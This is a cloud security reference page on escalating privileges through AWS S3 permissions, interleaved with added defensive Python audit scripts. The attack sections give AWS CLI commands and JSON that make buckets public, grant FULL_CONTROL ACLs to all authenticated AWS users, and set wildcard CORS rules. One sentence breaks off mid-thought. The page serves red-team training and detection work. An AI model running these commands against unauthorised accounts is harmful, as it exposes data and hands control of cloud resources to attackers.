AWS - S3 Privesc

Tip

Learn & practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

S3

s3:PutBucketNotification, s3:PutObject, s3:GetObject

An attacker with these permissions and access to a valuable bucket may be able to hijack resources and escalate privileges.

For example, an attacker with permissions over the CloudFormation bucket named "cf-templates-nohnwfax6a6i-us-east-1" could hijack deployments. That access can be granted by a policy such as:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:PutBucketNotification",
        "s3:GetBucketNotification",
        "s3:PutObject",
        "s3:GetObject"
      ],
      "Resource": [
        "arn:aws:s3:::cf-templates-*/*",
        "arn:aws:s3:::cf-templates-*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": "s3:ListAllMyBuckets",
      "Resource": "*"
    }
  ]
}

The hijack is possible because there is a short window of time between the moment a template is uploaded to the bucket and the moment it is deployed. The attacker may only need to create a Lambda function in their own account that is triggered by a bucket notification and replaces the bucket's contents.

The Pacu module cfn__resource_injection can be used to automate this attack.
For more information check the original research: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
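The defensive counterpart of the notification hijack described above is to audit which destinations a bucket's notification configuration fans out to. The following is an added example (not HackTricks' or Pacu's code) that parses the JSON returned by `aws s3api get-bucket-notification-configuration` and reports every Lambda, SNS or SQS destination whose account ID is not in the trusted set; the configuration and account IDs below are constructed.

```python
# Added example (not HackTricks' code): audit an S3 bucket notification
# configuration for event destinations owned by a foreign AWS account.
# Input is the JSON that `aws s3api get-bucket-notification-configuration`
# returns; the sample below is constructed with made-up account IDs.
import json

# Constructed sample: one in-account Lambda hook, one Lambda in an unrelated
# account that fires on every uploaded *.template, and one in-account SNS topic.
SAMPLE_NOTIFICATION_CONFIG = json.dumps({
    "LambdaFunctionConfigurations": [
        {
            "Id": "deploy-hook",
            "LambdaFunctionArn": "arn:aws:lambda:us-east-1:111111111111:function:deploy-hook",
            "Events": ["s3:ObjectCreated:*"],
        },
        {
            "Id": "watcher",
            "LambdaFunctionArn": "arn:aws:lambda:us-east-1:999999999999:function:watch",
            "Events": ["s3:ObjectCreated:Put"],
            "Filter": {"Key": {"FilterRules": [{"Name": "suffix", "Value": ".template"}]}},
        },
    ],
    "TopicConfigurations": [
        {"Id": "ops", "TopicArn": "arn:aws:sns:us-east-1:111111111111:ops-alerts",
         "Events": ["s3:ObjectRemoved:*"]},
    ],
})

# Each configuration list names its destination ARN under a different key.
DESTINATION_KEYS = {
    "LambdaFunctionConfigurations": "LambdaFunctionArn",
    "TopicConfigurations": "TopicArn",
    "QueueConfigurations": "QueueArn",
}


def arn_account(arn):
    """Return the account field of an ARN (arn:partition:service:region:account:resource)."""
    parts = arn.split(":", 5)
    return parts[4] if len(parts) >= 6 else ""


def foreign_destinations(config_json, trusted_accounts):
    """Return (rule Id, destination ARN) for every destination outside trusted_accounts."""
    config = json.loads(config_json)
    findings = []
    for list_key, arn_key in DESTINATION_KEYS.items():
        for rule in config.get(list_key, []):
            arn = rule.get(arn_key, "")
            if arn_account(arn) not in trusted_accounts:
                findings.append((rule.get("Id", ""), arn))
    return findings


if __name__ == "__main__":
    for rule_id, arn in foreign_destinations(SAMPLE_NOTIFICATION_CONFIG, {"111111111111"}):
        print(f"foreign notification destination {rule_id!r}: {arn}")
```

Run it against the real output of the CLI command for each cf-templates-* bucket; a destination in an account you do not own is exactly the foothold the attack above relies on, and CloudTrail's PutBucketNotification events show who installed it.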

s3:PutObject, s3:GetObject

These permissions allow getting and uploading objects from S3. Several services inside (and outside) AWS use S3 storage to hold config files.
An attacker with read access may find sensitive information in them.
An attacker with write access could tamper with the data to abuse some service and try to escalate privileges.
For example:

  • If an EC2 instance stores its user data in an S3 bucket, an attacker could modify that data to execute arbitrary code inside the EC2 instance.

s3:PutObject, s3:GetObject (optional) over terraform state file

In practice, terraform state files are usually stored in the cloud provider's blob storage, for example AWS S3. State files use the .tfstate suffix, and the bucket name usually also reveals that it holds terraform state files. Typically every AWS account has one such bucket with the state files describing that account's state. In reality, almost all developers tend to have s3:*, and sometimes even business users have s3:Put*.

So, if you have the permissions above over these files, there is an attack vector that lets you get RCE in the pipeline with terraform's permissions (AdministratorAccess in most cases), making you an admin of the cloud account. The same vector can be used for a denial of service (DoS), for example by making terraform delete legitimate resources.

For ready-to-use exploitation code, see the Abusing Terraform State Files section of the Terraform Security page:

Abusing Terraform State Files
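On the detection side, writes to a .tfstate object by anything other than the pipeline's own role are the signal to alert on. The following is an added example (not HackTricks' or Terraform's code) that scans CloudTrail S3 data events, exported one JSON record per line, and reports state-file writes by non-allow-listed principals; the role name, account ID, bucket, keys and timestamps are constructed.

```python
# Added example (not HackTricks' code): scan CloudTrail S3 data events for
# writes to Terraform state objects by anyone other than the pipeline role.
# ARNs, account ID, bucket, keys and timestamps below are constructed.
import json

# Hypothetical CI role. Session ARNs look like
# arn:aws:sts::<account>:assumed-role/<role-name>/<session-name>, so match on the prefix.
ALLOWED_WRITER_PREFIXES = ("arn:aws:sts::111111111111:assumed-role/terraform-ci/",)

# S3 data-event names that create, replace or remove a single object.
WRITE_EVENTS = {"PutObject", "CopyObject", "DeleteObject"}


def _event(name, actor, key, when):
    """Build a minimal CloudTrail S3 data-event record (constructed test data)."""
    return {"eventSource": "s3.amazonaws.com", "eventName": name, "eventTime": when,
            "userIdentity": {"arn": actor},
            "requestParameters": {"bucketName": "acme-terraform-state", "key": key}}


# Constructed trail export, one JSON record per line.
SAMPLE_TRAIL = "\n".join(json.dumps(e) for e in [
    _event("PutObject", "arn:aws:sts::111111111111:assumed-role/terraform-ci/build-42",
           "prod/terraform.tfstate", "2024-05-01T10:00:00Z"),   # pipeline: expected
    _event("GetObject", "arn:aws:iam::111111111111:user/dev-alice",
           "prod/terraform.tfstate", "2024-05-01T10:05:00Z"),   # read only: not a write
    _event("PutObject", "arn:aws:iam::111111111111:user/dev-alice",
           "prod/terraform.tfstate", "2024-05-01T10:06:00Z"),   # state tampering
    _event("PutObject", "arn:aws:iam::111111111111:user/dev-alice",
           "assets/logo.png", "2024-05-01T10:07:00Z"),          # not a state file
    _event("DeleteObject", "arn:aws:iam::111111111111:user/dev-bob",
           "prod/terraform.tfstate", "2024-05-01T11:00:00Z"),   # the DoS angle
])


def is_state_key(key):
    """State objects end in .tfstate; local backends also keep a .tfstate.backup."""
    return key.endswith(".tfstate") or key.endswith(".tfstate.backup")


def suspicious_state_writes(trail_lines, allowed_prefixes=ALLOWED_WRITER_PREFIXES):
    """Return (eventTime, actor ARN, bucket/key) for state writes by non-allow-listed actors."""
    findings = []
    for line in trail_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("eventSource") != "s3.amazonaws.com" or event.get("eventName") not in WRITE_EVENTS:
            continue
        params = event.get("requestParameters") or {}
        key = params.get("key", "")
        if not is_state_key(key):
            continue
        actor = event.get("userIdentity", {}).get("arn", "")
        if actor.startswith(allowed_prefixes):
            continue
        findings.append((event.get("eventTime", ""), actor, f"{params.get('bucketName', '')}/{key}"))
    return findings


if __name__ == "__main__":
    for when, actor, obj in suspicious_state_writes(SAMPLE_TRAIL):
        print(f"{when} {actor} wrote {obj}")
```

These records only exist if S3 data events are enabled on the trail for the state bucket; management events alone will not show PutObject. Pairing the alert with S3 versioning on the bucket keeps the previous state object available for comparison and rollback.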

s3:PutBucketPolicy

An attacker with this permission, who needs to be from the same account (otherwise the error "The specified method is not allowed" is triggered), will be able to grant himself more permissions over the bucket(s), allowing him to read, write, modify, delete and expose buckets.

# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and maintaining some previous root access
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:root"
      },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::somebucketname"
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:user/username"
      },
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::somebucketname/*"
    }
  ]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1568184932403",
      "Action": [
        "s3:ListBucket"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome",
      "Principal": "*"
    },
    {
      "Sid": "Stmt1568185007451",
      "Action": [
        "s3:GetObject"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome/*",
      "Principal": "*"
    }
  ]
}
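Reviewing bucket policies for the exposure described in this section means finding Allow statements whose Principal is the wildcard, in either of its spellings (`"*"` or `{"AWS": "*"}`). The following is an added example (not HackTricks' code) that does this over the policy JSON returned by `aws s3api get-bucket-policy`; the two policies from this section are embedded as inputs, plus a constructed wildcard statement narrowed by a condition (hypothetical VPC endpoint ID) to show why a Condition deserves a separate verdict.

```python
# Added example (not HackTricks' code): flag bucket-policy statements that
# grant access to everyone. Input is the policy document (a JSON string) that
# `aws s3api get-bucket-policy` returns in its "Policy" field.
import json

# The two policies shown in this section, embedded as inputs.
USER_GRANT_POLICY = json.dumps({
    "Id": "Policy1568185116930", "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123123123123:root"},
         "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::somebucketname"},
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123123123123:user/username"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::somebucketname/*"},
    ],
})
PUBLIC_POLICY = json.dumps({
    "Id": "Policy1568185116930", "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Stmt1568184932403", "Action": ["s3:ListBucket"], "Effect": "Allow",
         "Resource": "arn:aws:s3:::welcome", "Principal": "*"},
        {"Sid": "Stmt1568185007451", "Action": ["s3:GetObject"], "Effect": "Allow",
         "Resource": "arn:aws:s3:::welcome/*", "Principal": "*"},
    ],
})
# Constructed: the {"AWS": "*"} spelling of the wildcard, narrowed by a condition
# (hypothetical VPC endpoint ID). Not world-readable, but still worth a review.
VPCE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "VpceOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::internal/*",
                   "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}],
})


def as_list(value):
    """IAM lets most fields be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def principals_of(statement):
    """Flatten the Principal element into a list of principal strings."""
    principal = statement.get("Principal")
    if principal is None:
        return []
    if isinstance(principal, dict):  # {"AWS": [...], "Service": ..., ...}
        return [p for values in principal.values() for p in as_list(values)]
    return as_list(principal)


def public_statements(policy_json):
    """Return (Sid, actions, 'public' | 'conditional') for Allow statements with a '*' principal."""
    policy = json.loads(policy_json)
    findings = []
    for statement in as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow" or "*" not in principals_of(statement):
            continue
        status = "conditional" if statement.get("Condition") else "public"
        findings.append((statement.get("Sid", ""), as_list(statement.get("Action", [])), status))
    return findings


if __name__ == "__main__":
    for name, doc in (("user grant", USER_GRANT_POLICY), ("public", PUBLIC_POLICY), ("vpce", VPCE_POLICY)):
        print(name, public_statements(doc))
```

The access-denied behaviour noted in the heading above is S3 Block Public Access doing its job: with the "block public policies" setting on, a put-bucket-policy call that would make the bucket public is rejected regardless of the caller's IAM permissions, which is why it belongs on every bucket that is not deliberately public.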

s3:GetBucketAcl, s3:PutBucketAcl

An attacker can abuse these permissions to grant himself more access over specific buckets.
Note that the attacker does not need to be from the same account. Moreover, write access

# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

## JSON ACL example
## Make sure to modify the Owner's DisplayName and ID according to the ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectAcl

An attacker can abuse these permissions to grant himself more access over specific objects inside buckets.

# Update bucket object ACL
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

## JSON ACL example
## Make sure to modify the Owner's DisplayName and ID according to the Object ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectVersionAcl

An attacker with these permissions should be able to apply an ACL to a specific version of an object.

aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
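The bucket, object and object-version ACL abuses in the three sections above all produce the same artefact: a grant to one of the global groups (AllUsers or AuthenticatedUsers) or an ACL-changing permission (WRITE_ACP, FULL_CONTROL) handed to a canonical user who is not the owner. The following is an added example (not HackTricks' code) that reviews the JSON returned by `aws s3api get-bucket-acl` or `get-object-acl` (with or without `--version-id`) for exactly those grants; the canonical IDs and grants in the sample are constructed, with the AuthenticatedUsers grant taken from the ACL shown above.

```python
# Added example (not HackTricks' code): flag ACL grants to the AllUsers /
# AuthenticatedUsers groups, and ACL-changing permissions granted to canonical
# users other than the owner. Input is the JSON returned by
# `aws s3api get-bucket-acl` or `aws s3api get-object-acl`.
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anyone, no AWS account needed)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}
# Permissions that let the grantee rewrite the ACL and so re-grant access later.
ACL_CHANGING = {"WRITE_ACP", "FULL_CONTROL"}

# Constructed canonical IDs (real ones are 64 hex characters).
OWNER_ID = "a" * 64
OTHER_ID = "b" * 64

# Constructed ACL: the owner, the AuthenticatedUsers grant used on this page,
# and two grants to a canonical user from another account.
SAMPLE_ACL = json.dumps({
    "Owner": {"DisplayName": "bucket-owner", "ID": OWNER_ID},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": OWNER_ID}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "CanonicalUser", "ID": OTHER_ID}, "Permission": "READ"},
        {"Grantee": {"Type": "CanonicalUser", "ID": OTHER_ID}, "Permission": "WRITE_ACP"},
    ],
})


def risky_grants(acl_json):
    """Return (kind, grantee, permission) for every grant worth reviewing."""
    acl = json.loads(acl_json)
    owner_id = acl.get("Owner", {}).get("ID")
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        permission = grant.get("Permission", "")
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(("group", PUBLIC_GROUPS[grantee["URI"]], permission))
        elif (grantee.get("Type") == "CanonicalUser" and grantee.get("ID") != owner_id
              and permission in ACL_CHANGING):
            findings.append(("canonical-user", grantee["ID"], permission))
    return findings


if __name__ == "__main__":
    for kind, grantee, permission in risky_grants(SAMPLE_ACL):
        print(f"{kind}: {grantee} has {permission}")
```

A cross-account READ grant is deliberately not reported, since cross-account sharing via ACLs is legitimate; what makes the two flagged grants dangerous is that WRITE_ACP and FULL_CONTROL let the grantee put a new ACL, which is the re-grant step the sections above rely on. Setting the bucket's Object Ownership to "bucket owner enforced" disables ACLs altogether and removes this attack surface.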

s3:PutBucketCORS

An attacker with the s3:PutBucketCORS permission can modify the bucket's CORS (Cross-Origin Resource Sharing) configuration, which controls which web origins may access its endpoint. If they set an overly permissive policy, any website can send direct requests to the bucket and read the responses in the browser.

This means that if a user who is already authenticated to a web app hosted on that bucket visits the attacker's website, the attacker could exploit the permissive CORS policy and, depending on the application, access the user's profile data or even hijack the user's account.

aws s3api put-bucket-cors \
  --bucket <BUCKET_NAME> \
  --cors-configuration '{
    "CORSRules": [
      {
        "AllowedOrigins": ["*"],
        "AllowedMethods": ["GET", "PUT", "POST"],
        "AllowedHeaders": ["*"],
        "ExposeHeaders": ["x-amz-request-id"],
        "MaxAgeSeconds": 3000
      }
    ]
  }'
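Catching this change means comparing the bucket's CORS rules against the origins the application actually needs. The following is an added example (not HackTricks' code) that reviews the JSON returned by `aws s3api get-bucket-cors` against an allow-list and reports every rule admitting a wildcard or unlisted origin, together with the mutating methods it permits; the configuration is constructed, with its first rule being the permissive one shown above and `https://app.example.com` a hypothetical legitimate origin.

```python
# Added example (not HackTricks' code): review a bucket CORS configuration
# against an allow-list of origins. Input is the JSON that
# `aws s3api get-bucket-cors` returns; the sample is constructed and its
# first rule is the permissive one shown on this page.
import json

# Methods that change data; a wildcard origin with these is the worst case.
MUTATING_METHODS = {"PUT", "POST", "DELETE"}

SAMPLE_CORS = json.dumps({"CORSRules": [
    {"AllowedOrigins": ["*"], "AllowedMethods": ["GET", "PUT", "POST"],
     "AllowedHeaders": ["*"], "ExposeHeaders": ["x-amz-request-id"], "MaxAgeSeconds": 3000},
    {"AllowedOrigins": ["https://app.example.com"], "AllowedMethods": ["GET"],
     "AllowedHeaders": ["Authorization"]},                      # hypothetical legitimate rule
    {"AllowedOrigins": ["https://*.example.com"], "AllowedMethods": ["GET"]},  # subdomain wildcard
]})


def risky_cors_rules(cors_json, allowed_origins):
    """Return (rule index, offending origins, mutating methods) for every rule that
    admits an origin outside allowed_origins. A '*' anywhere in an origin is a wildcard."""
    cors = json.loads(cors_json)
    findings = []
    for index, rule in enumerate(cors.get("CORSRules", [])):
        offending = [origin for origin in rule.get("AllowedOrigins", [])
                     if "*" in origin or origin not in allowed_origins]
        if not offending:
            continue
        mutating = sorted(MUTATING_METHODS & set(rule.get("AllowedMethods", [])))
        findings.append((index, offending, mutating))
    return findings


if __name__ == "__main__":
    for index, origins, methods in risky_cors_rules(SAMPLE_CORS, {"https://app.example.com"}):
        print(f"rule {index}: origins {origins} with mutating methods {methods or 'none'}")
```

Subdomain wildcards are reported too, because any compromised or user-controlled host under that domain becomes an allowed origin. The fix is to replace the rule with explicit origins via put-bucket-cors, or to remove the configuration entirely with delete-bucket-cors when the bucket is not meant to be read from browsers, and to alert on PutBucketCors events in CloudTrail.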
